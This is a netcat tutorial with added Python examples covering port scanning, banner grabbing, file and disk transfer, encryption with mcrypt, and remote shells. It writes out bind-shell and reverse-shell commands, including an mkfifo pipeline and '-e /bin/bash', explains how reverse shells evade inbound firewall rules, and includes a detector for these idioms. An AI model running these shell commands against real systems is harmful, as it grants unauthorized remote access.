Netcat is the Swiss Army knife of network tools: it reads and writes data across the network over TCP and UDP. Combined with other tools and shell redirection, it can be used in scripts in many ways, and what the Netcat command can do is surprising.
What Netcat does is establish a connection between two computers and give you two data streams, one in each direction. What you do after that depends on your imagination: you can create a server, transfer files, chat with a friend, stream media, or use it as a standalone client for other protocols.
Here are some examples of using Netcat.
[The two machines used in the examples are A (172.31.100.7) and B (172.31.100.23)]
Linux Netcat command examples:
1. Port scanning
Port scanning is used by system administrators and attackers alike to find the open ports on a host; the open ports and the services behind them are the starting point for identifying vulnerabilities.
$nc -z -v -n 172.31.100.7 21-25
Netcat scans in TCP mode by default; add -u to scan UDP ports instead (UDP results are far less reliable, because a port that simply stays silent cannot be told apart from an open one).
- -z: zero-I/O mode. Netcat only completes the connection and closes it again, without sending or receiving any data; this is the scanning mode.
- -v: verbose. Print a line for each connection attempt, which is how you see which ports succeeded.
- -n: numeric only. Do not use DNS to resolve names or to reverse-resolve the IP address.
This command reports which of the ports 21 to 25 are open. A banner is the text a service sends you as soon as you connect (an FTP or SMTP greeting, an SSH version string). It is very useful when you are trying to identify a service's type and version, and from there its known vulnerabilities. Not every service sends one, though: some, HTTP for example, wait for the client to speak first.
Once you have found an open port, connect to it with Netcat to capture its banner:
$nc -v 172.31.100.7 21
This connects to port 21 and prints whatever the service running there sends on connection.
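The connect scan and the banner grab above, written out in Python as an added example (this is not code from the original article). It starts a throwaway local service whose banner text is constructed for the demo, sweeps a port range the way nc -z does (complete the TCP handshake, send nothing, close), and then reads the banner the way nc -v shows it. The hostnames and ports are assumptions for the demo; only TCP is covered.

```python
import socket
import socketserver
import threading


class _BannerHandler(socketserver.BaseRequestHandler):
    """Throwaway service that greets each client with a banner, like an FTP daemon."""

    def handle(self):
        try:
            self.request.sendall(self.server.banner)
        except OSError:
            pass  # a -z style scanner closes before reading; that is fine


def start_banner_server(banner=b"220 example FTP ready\r\n"):
    """Start a constructed target on 127.0.0.1 and an ephemeral port.
    Returns (server, port); call server.shutdown() and server.server_close() when done."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _BannerHandler)
    srv.daemon_threads = True
    srv.banner = banner
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def scan_ports(host, ports, timeout=0.5):
    """Zero-I/O connect scan, what `nc -z -v -n host 21-25` does: complete the
    TCP handshake on each port, send nothing, close. Returns the open ports."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns an errno instead of raising: 0 means the
            # handshake completed (open), ECONNREFUSED means closed, and a
            # timeout usually means a firewall dropped the SYN (filtered).
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host, port, timeout=2.0, max_bytes=1024):
    """What `nc -v host port` shows you: connect and read whatever the service
    volunteers, up to the first newline. Services that wait for the client to
    speak first (HTTP, for one) yield b""."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            while len(data) < max_bytes and not data.endswith(b"\n"):
                chunk = s.recv(max_bytes - len(data))
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass  # silent service: return what we have, possibly nothing
    return data


if __name__ == "__main__":
    srv, port = start_banner_server()
    print("open ports:", scan_ports("127.0.0.1", range(port - 2, port + 3)))
    print("banner on %d: %r" % (port, grab_banner("127.0.0.1", port)))
    srv.shutdown()
    srv.server_close()
```

Like nc -z, this is a full connect scan: every probe completes the three-way handshake and shows up in the target's logs as a connection, which is something to keep in mind when scanning anything you do not own.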
2. Chat server
If you want to talk to your friends there is plenty of chat software and plenty of services for it. But suppose you do not have that luxury, for example in a computer lab where all external connections are blocked: how do you talk to the friend sitting in the next room all day? Do not despair, Netcat offers a way. You only need to start a chat server on a port agreed in advance so that your friend can connect to you.
Server
$nc -l 1567
This starts a TCP listener on port 1567. Whatever you type on standard input is sent to the peer, and whatever arrives from the peer is printed on standard output, so both sides of the conversation show up in this shell. (The OpenBSD netcat and Nmap's ncat accept -l 1567 as written here; the traditional GNU netcat wants -l -p 1567. The same applies to every -l command below.)
Client
$nc 172.31.100.7 1567
Whatever you type on machine B appears on machine A, and vice versa.
3. File transfer
Most of the time we move files with FTP, SCP, SMB and the like, but when you only need to move a file once, it is hardly worth installing and configuring a service for it. Assume you want to copy File.txt from A to B. Either machine can be the listener (the "server") or the client; below, A is the server and B the client.
Server
$nc -l 1567 < file.txt
Client
$nc -n 172.31.100.7 1567 > file.txt
Here A listens on port 1567 with file.txt as Netcat's standard input, so as soon as a client connects, Netcat sends the file's contents to it.
On B, Netcat's standard output is redirected into file.txt, so when B connects, whatever A sends is saved there. Two things to keep in mind: any client that connects gets the file, nothing authenticates the peer, so only do this on a network you trust; and a dropped connection leaves a silently truncated copy, so compare checksums (sha256sum on both ends) afterwards. Some Netcat builds also do not close the connection when their input hits end-of-file; the OpenBSD netcat needs -N for that and the traditional netcat -q 0, otherwise the listener sits there after the file has been sent.
The listener does not have to be the sending side either; the redirections can be reversed. Below, B listens and receives while A connects and sends, so the file still travels from A to B. This time Netcat's output is redirected on the server and its input on the client.
B as server
Server
$nc -l 1567 > file.txt
Client
$nc 172.31.100.23 1567 < file.txt
4. Directory transfer
Sending one file is easy, and sending several files or a whole directory is just as simple: pack them with tar first and send the archive.
To send a directory from A to B over the network:
Server
$tar -cvf - dir_name | nc -l 1567
Client
$nc -n 172.31.100.7 1567 | tar -xvf -
On A, tar creates an archive of dir_name and writes it to standard output (the - in place of a file name), which the pipe feeds into Netcat; Netcat sends it over the network as soon as B connects.
On B, Netcat's output goes through the pipe into tar, which unpacks the archive as it arrives. Be aware that tar -x creates whatever paths the archive contains, so only unpack streams from a source you trust.
If you want to save bandwidth, compress the archive with bzip2 or another compressor on the way:
Server
$tar -cvf - dir_name | bzip2 -z | nc -l 1567
Compress with bzip2.
Client
$nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -
Decompress with bzip2.
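The file and directory transfers of sections 3 and 4, as an added example that is not part of the original article: a Python listener that streams a tar archive of a directory over a socket and a client that unpacks it, with two things the plain nc pipeline does not give you. Each side keeps a SHA-256 over the bytes it saw, so a truncated transfer is detected, and the receiver refuses archive entries that would land outside the destination directory. The listener also closes the connection after the archive, which is the behaviour the -N / -q 0 note above is about. The directory contents, the loopback address and the ephemeral port are constructed for the demo.

```python
import hashlib
import os
import socket
import tarfile
import tempfile
import threading


class _HashingStream:
    """File-like wrapper that SHA-256s every byte passing through it; nc itself
    gives you no way to tell a complete transfer from a truncated one."""

    def __init__(self, raw):
        self.raw = raw
        self.digest = hashlib.sha256()

    def write(self, data):
        self.digest.update(data)
        return self.raw.write(data)

    def read(self, size=-1):
        data = self.raw.read(size)
        self.digest.update(data)
        return data

    def flush(self):
        self.raw.flush()

    def close(self):
        self.raw.close()


def serve_directory(dir_path, host="127.0.0.1"):
    """Listener side of `tar -cvf - dir_name | nc -l 1567`: stream a tar of
    dir_path to the first client on an ephemeral port, then close so the peer
    sees EOF. Returns (port, thread, result); the thread fills result["sha256"]."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.bind((host, 0))
    lsock.listen(1)
    port = lsock.getsockname()[1]
    result = {}

    def run():
        conn, _ = lsock.accept()
        lsock.close()
        with conn:
            out = _HashingStream(conn.makefile("wb"))
            # "w|" produces a non-seekable stream, as a pipe or socket requires
            with tarfile.open(fileobj=out, mode="w|") as tar:
                tar.add(dir_path, arcname=os.path.basename(dir_path))
            out.flush()
            result["sha256"] = out.digest.hexdigest()
            out.close()  # drop the file object so the socket really closes

    thread = threading.Thread(target=run, daemon=True)
    thread.start()
    return port, thread, result


def receive_directory(host, port, dest_dir):
    """Client side of `nc -n 172.31.100.7 1567 | tar -xvf -`, plus a check that
    no entry escapes dest_dir. Returns the hex digest of all bytes received."""
    root = os.path.realpath(dest_dir)
    # Newer tarfile releases enforce this (and symlink targets) via filter="data"
    extract_kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with socket.create_connection((host, port)) as conn:
        inp = _HashingStream(conn.makefile("rb"))
        with tarfile.open(fileobj=inp, mode="r|") as tar:
            for member in tar:  # stream mode: extract each entry as it arrives
                target = os.path.realpath(os.path.join(root, member.name))
                if target != root and not target.startswith(root + os.sep):
                    raise ValueError("entry escapes %s: %s" % (root, member.name))
                tar.extract(member, root, **extract_kwargs)
        while inp.read(65536):  # drain to EOF so the digest covers the whole stream
            pass
        inp.close()
    return inp.digest.hexdigest()


def demo_transfer():
    """Ship a small constructed directory over loopback; return
    (sender_digest, receiver_digest, {relative path: contents})."""
    with tempfile.TemporaryDirectory() as work:
        src = os.path.join(work, "dir_name")
        os.makedirs(os.path.join(src, "sub"))
        with open(os.path.join(src, "file.txt"), "w") as f:
            f.write("hello from A\n")
        with open(os.path.join(src, "sub", "notes.txt"), "w") as f:
            f.write("constructed sample data\n")
        dest = os.path.join(work, "received")
        os.mkdir(dest)

        port, thread, result = serve_directory(src)
        recv_digest = receive_directory("127.0.0.1", port, dest)
        thread.join(timeout=10)

        got = {}
        for dirpath, _, files in os.walk(dest):
            for name in files:
                path = os.path.join(dirpath, name)
                with open(path) as f:
                    got[os.path.relpath(path, dest).replace(os.sep, "/")] = f.read()
        return result.get("sha256"), recv_digest, got


if __name__ == "__main__":
    sent, received, files = demo_transfer()
    print("sender", sent, "\nreceiver", received, "\nfiles", sorted(files))
```

With the nc pipeline you get the same assurance by running sha256sum over the archive (or over tar's output) on both machines and comparing out of band; the path check is what tar -x of an untrusted stream is missing.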
5. Encrypt the data you send over the network
If you are worried about the data being read in transit, encrypt it with a tool such as mcrypt before handing it to Netcat. Here the server (A) encrypts and sends, and the client (B) receives and decrypts.
Server
$mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567
Encrypt with mcrypt and send.
Client
$nc 172.31.100.7 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt
Receive and decrypt with mcrypt.
Both commands prompt for a passphrase; make sure the same one is entered on both ends.
mcrypt is only one option; any filter that encrypts standard input to standard output can be used the same way. Two caveats, though. ECB mode, as used here, encrypts identical plaintext blocks to identical ciphertext blocks and therefore leaks the structure of the data, and nothing in this pipeline detects tampering or truncation. For anything that matters, prefer an authenticated transport such as an SSH tunnel, or at least a mode other than ECB together with a checksum of the plaintext compared out of band. mcrypt itself has not been maintained for years.
6. Stream video
This is not the best way to stream video, but if there is no dedicated streaming tool on the server, Netcat will do.
Server
$cat video.avi | nc -l 1567
Here we just read the video file and feed it to the Netcat listener.
Client
$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -
Here we read the data from the socket and pipe it into mplayer, which plays from standard input (the trailing -) with a 3000 KB cache to smooth out network jitter.
7. Clone a disk
If you have installed and configured a Linux machine and need the same setup on other machines, you do not have to repeat the installation. Boot the other machine from a live medium and clone your machine's disk over the network.
Cloning a Linux PC is simple. Assume your system lives on the disk /dev/sda.
Server
$dd if=/dev/sda | nc -l 1567
Client
$nc -n 172.31.100.7 1567 | dd of=/dev/sda
dd reads the raw disk; the Netcat listener hands the data to the other machine, where dd writes it to the disk. This copies everything, including the partition table, so the target disk must be at least as large as the source, and it must not be mounted while it is being overwritten, which is why the target is booted from a live medium rather than from its own disk. If the target is already partitioned and you only need the root partition, change sda to sda1 or sda2 on both sides, depending on where the root partition lives. Adding bs=4M to both dd commands speeds the copy up considerably.
8. Open a shell
Remote shells are normally provided by telnet or ssh, but if neither is installed and you lack the permission to install them, Netcat can provide one.
Assume first that your Netcat supports the -e or -c option (the traditional GNU netcat and Nmap's ncat do; the OpenBSD netcat deliberately leaves them out).
Server
$nc -l 1567 -e /bin/bash
Client
$nc 172.31.100.7 1567
Here we started a Netcat listener that runs /bin/bash, with its standard input and output attached to the connection, as soon as a client connects. This is a bind shell: anyone who can reach port 1567 gets a shell as the user running Netcat, with no authentication at all, which is exactly why the OpenBSD netcat omits -e.
If your Netcat does not support -c or -e (the OpenBSD netcat), you can still build a remote shell.
Server
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
Here we create a named pipe (fifo) and build a loop out of it: cat reads the fifo and feeds it to an interactive shell; 2>&1 merges the shell's standard error into its standard output, which is piped into Netcat listening on port 1567; and Netcat's own output, i.e. whatever arrives from the network, is redirected into the fifo. So:
- input received from the network is written to the fifo;
- cat reads the fifo and hands it to sh as commands;
- the output of sh is piped back into Netcat;
- Netcat sends it to the client over the network.
All stages of a pipeline run concurrently, which is what makes this work. The fifo is used instead of an ordinary file because a read on a fifo blocks until someone writes to it; with a regular file, cat would hit end-of-file immediately and exit.
9. Connect to the shell from the client
Client
$nc -n 172.31.100.7 1567
You get a shell on the client. A bash started this way is not interactive, so you may not see a prompt; type a command and its output comes back over the connection.
Reverse shell
In a reverse shell the roles are swapped: the shell runs on the client, which connects out to a plain listener on the server. The name comes from that reversal; here the server consumes a service the client provides.
Server
$nc -l 1567
On the client it is just as easy to tell Netcat to run a shell once the connection is established.
Client
$nc 172.31.100.7 1567 -e /bin/bash
What makes a reverse shell special?
Reverse shells are often used to get around firewall rules that block inbound connections. For example, if my machine has the private address 172.31.100.7 and reaches the outside only through a proxy, nobody outside can connect in to a bind shell on it, but it can still connect out. So to reach its shell from an external host such as 1.2.3.4, I run the listener on 1.2.3.4 and have 172.31.100.7 connect to it with -e. This is also why attacker payloads almost always take the reverse form, and why outbound connections from unexpected processes deserve monitoring.
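The bind shell of section 8 and the reverse shell above look the same from the defender's side: a netcat process started with an exec flag, or a shell sitting in a pipeline with netcat. As an added example (not part of the original article), here is a small classifier that runs over a constructed process log and flags those idioms, telling a bind shell (-l present) from a reverse shell (no -l) and recognising the fifo variant. The log format, hostnames, pids and command lines are all made up for the demo; a real detector would also look at process ancestry and socket ownership rather than command lines alone.

```python
import re
import shlex

# Process names under which netcat commonly appears
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
# Flags that make netcat run a program on the connection (traditional nc, ncat)
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh"}

# Constructed sample process log, not real data: one command execution per line
SAMPLE_LOG = """\
2024-05-01T10:00:01 host=A pid=1201 cmd="nc -l 1567 -e /bin/bash"
2024-05-01T10:00:07 host=B pid=1302 cmd="nc 172.31.100.7 1567 -e /bin/bash"
2024-05-01T10:00:12 host=A pid=1405 cmd="cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo"
2024-05-01T10:00:20 host=B pid=1500 cmd="nc -z -v -n 172.31.100.7 21-25"
2024-05-01T10:00:25 host=A pid=1601 cmd="tar -cvf - dir_name | nc -l 1567"
2024-05-01T10:00:31 host=B pid=1700 cmd="ncat --sh-exec '/bin/bash -i' 172.31.100.7 1567"
2024-05-01T10:00:40 host=A pid=1800 cmd="sh -c 'echo hello'"
"""

LOG_RE = re.compile(r'host=(\S+) pid=(\d+) cmd="(.*)"$')


def _basename(token):
    return token.rsplit("/", 1)[-1]


def classify_command(cmdline):
    """Classify one command line as "bind_shell", "reverse_shell", "fifo_shell"
    or None, using only the netcat idioms shown in the article above."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: not parseable, leave it alone
        return None
    nc_idx = [i for i, tok in enumerate(argv) if _basename(tok) in NETCAT_NAMES]
    if not nc_idx:
        return None
    nc_args = argv[nc_idx[0] + 1:]
    # -l on its own, --listen, or bundled into a short-flag group such as -lvp
    listening = any(
        a in ("-l", "--listen")
        or (a.startswith("-") and not a.startswith("--") and "l" in a[1:])
        for a in nc_args
    )
    if any(a in EXEC_FLAGS for a in nc_args):
        return "bind_shell" if listening else "reverse_shell"
    # The fifo trick: a shell in the same pipeline as netcat, e.g.
    # cat FIFO | /bin/sh -i 2>&1 | nc -l 1567 > FIFO
    if "|" in argv and any(_basename(t) in SHELL_NAMES for t in argv):
        return "fifo_shell"
    return None


def scan_process_log(text):
    """Run the classifier over log lines in the constructed format above and
    return (host, pid, verdict, cmd) for every line that looks like a shell."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        host, pid, cmd = m.group(1), int(m.group(2)), m.group(3)
        verdict = classify_command(cmd)
        if verdict:
            hits.append((host, pid, verdict, cmd))
    return hits


if __name__ == "__main__":
    for host, pid, verdict, cmd in scan_process_log(SAMPLE_LOG):
        print("%s pid=%d %s: %s" % (host, pid, verdict, cmd))
```

The port scan and the tar pipeline in the sample log are deliberately left unflagged: neither hands a shell to the network, and a rule that fires on every nc invocation would drown the interesting ones.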
10. Specify the source port
If a firewall between the two machines only lets through traffic from certain source ports, say port 25, use the -p option to choose the client's source port.
Server
$nc -l 1567
Client
$nc 172.31.100.7 1567 -p 25
Binding a source port below 1024 requires root (or CAP_NET_BIND_SERVICE on Linux).
This makes the client send from port 25; without -p, Netcat picks a random ephemeral source port.
11. Specify the source address
If your machine has several addresses and you want to choose which one the connection goes out from, use the -s option to name the IP address.
Server
$nc -u -l 1567 < file.txt
Client
$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt
This binds the client to its address 172.31.100.5. Both ends use -u here, so the transfer runs over UDP; with the OpenBSD netcat a UDP listener has no peer to send to until the client's first datagram arrives, so type something on the client to get the transfer started, and remember that UDP gives no delivery guarantee.
These are only some of the things Netcat can do.
Other uses:
- the -t option, which answers telnet option negotiation so Netcat can stand in for a Telnet client,
- a minimal HTTP client for downloading files,
- talking SMTP to a mail server by hand to check on mail delivery,
- capturing the screen with ffmpeg and streaming it over the network, and many more.
Put simply, as long as you understand the protocol, Netcat can serve as the transport for a hand-made client of it.